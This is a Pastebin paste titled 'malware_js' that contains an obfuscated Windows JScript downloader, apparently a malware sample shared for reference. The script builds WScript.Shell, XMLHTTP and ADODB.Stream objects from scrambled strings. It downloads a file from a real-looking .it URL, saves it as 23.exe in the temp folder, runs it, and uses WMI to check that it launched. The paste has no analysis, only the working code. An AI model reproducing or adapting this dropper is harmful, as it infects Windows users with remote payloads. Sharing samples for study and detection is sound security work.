Advertisement
opexxx

malware_js

Nov 4th, 2016
200
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.18 KB | None | 0 0
  1. "Wed Oct 5 15:12:00 PDT 2016"
  2. function EONlDaKrDM(dUpprcYC,yrqQYUDWNqvo) {dUpprcYC.Run(yrqQYUDWNqvo, 0x1, 0x0);}
  3. /*mbRZaEZYYPUjhmpYYZvkuHWkWqeQBEFtHCKNoPeoSwZPtbgGqKLIFbykNgGfKDTLWxxUvtdYGvYOAkRIBOVzKPUExpbONVaxfLdvxqWbmPPhzMveHnYKIWjraSpRJHbChtDqrHIyNBBTsHSSFeUozwsxyPxnzNVbcuXEfrophIgZfXjbypLmkqvYOfzdjmJTRPklNvNyuh*/gdHnDZTwUlYlv();
  4. var WRXJN = ["http://masseriacarparelli.it/logs.php"];
  5. var CZUm=965-965;
  6. while(true) {
  7. if(WRXJN.length<=932-932) break;
  8. var cLqH = UpVmDKM() % WRXJN.length;
  9. var CWeynexRp=WRXJN[cLqH];
  10. var QKyBB=UpVmDKM();
  11. var TYXetqZSGF='23.exe';
  12. var mFaYSHk='23.exe';
  13. var hVhghTlZ=104-103;
  14. var RJHwnVTTv = function(){
  15. return new ActiveXObject(bwolf('WS&gLxVGsmNA&cript&gLxVGsmNA&.She&l&l',[0,2,4,5,6],'&'));
  16. }();
  17. var mFaYSHk = TqrGdj(RJHwnVTTv) + String.fromCharCode(92) + mFaYSHk;
  18. var ykhQu = function(){
  19. return new ActiveXObject(bwolf('MSX&nSMiHkhqS&ML2.XM&UHjrbyFdkrV&LHTTP',[0,2,4],'&'));
  20. }();
  21. yHeJ(CWeynexRp,ykhQu);
  22. if (ykhQu.status == 100+100) {
  23. var FaIVtRc = function() {
  24. return new ActiveXObject(bwolf('ADO&DB&AzyYHBFgW&.&tVjrGiBru&Stream',[0,1,3,5],'&'));
  25. }();
  26. var gcBaWrkIyyPS=oVXQc(FaIVtRc,ykhQu.ResponseBody,mFaYSHk);
  27. }
  28. try {
  29. EONlDaKrDM(RJHwnVTTv,mFaYSHk);
  30. var RjOiqRJ = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TYXetqZSGF+'\'');
  31. if ( RjOiqRJ.Count >= 1 ){break;}
  32. } catch(e) {}
  33. CZUm++;
  34. WRXJN.splice (cLqH,684-683);
  35. }
  36. function TqrGdj(gehkZh){var hDDdvMnk=["ExpandEnvironmentStrings"];return gehkZh[hDDdvMnk[0]]('%TMP%')}
  37. function oVXQc(RYPaBXEa,ZyWwH,FcezZGqaIV){try{RYPaBXEa.open();IOLujkIO(RYPaBXEa);VFmZfSR(RYPaBXEa,ZyWwH);uXjaSazLA(RYPaBXEa);MoKX(RYPaBXEa,FcezZGqaIV);YgnGvsTY=RYPaBXEa.size;bcuroUR(RYPaBXEa);return YgnGvsTY;}catch(e){}}
  38. function yHeJ(yxYYoN,iCmbMGj){try{moXy = 'G*STLWRiJVJj*E*T*anqDxqmtlWum'.split('*');iCmbMGj.open(moXy[0]+moXy[2]+moXy[3], yxYYoN, false);iCmbMGj.setRequestHeader("User-Agent", "Python-urllib/3.1");iCmbMGj.send();}catch(e){}}
  39. function bwolf(JSWiaEyv,nwvEPT,SVwTveCUi){xCsZm=JSWiaEyv.split(SVwTveCUi);VjwYYUc = 'ucW';for(rXWJtZvf=0;rXWJtZvf<nwvEPT.length;rXWJtZvf++) {VjwYYUc+=xCsZm[nwvEPT[rXWJtZvf]];}return VjwYYUc.substring(3,VjwYYUc.length);}
  40. function gdHnDZTwUlYlv() {/*rIeIICpxkd().Sleep(2272-156);*/}
  41. function VKZpHFh(){var JJsZBn=["random"];return Math[JJsZBn[0]]()}
  42. function wqrr(qAGWwr) {qAGWwr.open();}
  43. function IOLujkIO(vclddJTss) {vclddJTss.type=1;}
  44. function VFmZfSR(kfEK,LnpYN) {kfEK.write(LnpYN);}
  45. function rIeIICpxkd() {return/*oyWQMeqTVgqSzWvRLsDvpMnJxWwnVnEkTEIfdmieLebMCwLhMimUdEbeKDequxRJreoOoOUJvvFayqVQIrPNKQKTREFONbYDJWOQsJzHY*/WScript;}
  46. function uXjaSazLA(wxFJKi) {var TlOlnxhMXn=[];wxFJKi.position=TlOlnxhMXn.length*(912382-201);}
  47. function MoKX(dXLtdsL,UmEVrAk) {dXLtdsL.saveToFile(UmEVrAk, 2);}
  48. function bcuroUR(Eujpa) {Eujpa.close();}
  49. function UpVmDKM() {var dkHn=100000;var yHdejl = 100;return Math.round(VKZpHFh()*(dkHn-yHdejl)+yHdejl);}
  50. function youPQwRK(CIMOI) {var DPuGlnst='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var lRcwI=0;lRcwI<CIMOI;lRcwI++){LoLhI+=DPuGlnst.charAt(Math.floor(Math.random()*DPuGlnst.length));}return LoLhI;}
  51. function EyLFuCjUuDOErR(YOumLeqeAEqmoS) {return new ActiveXObject(YOumLeqeAEqmoS);}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement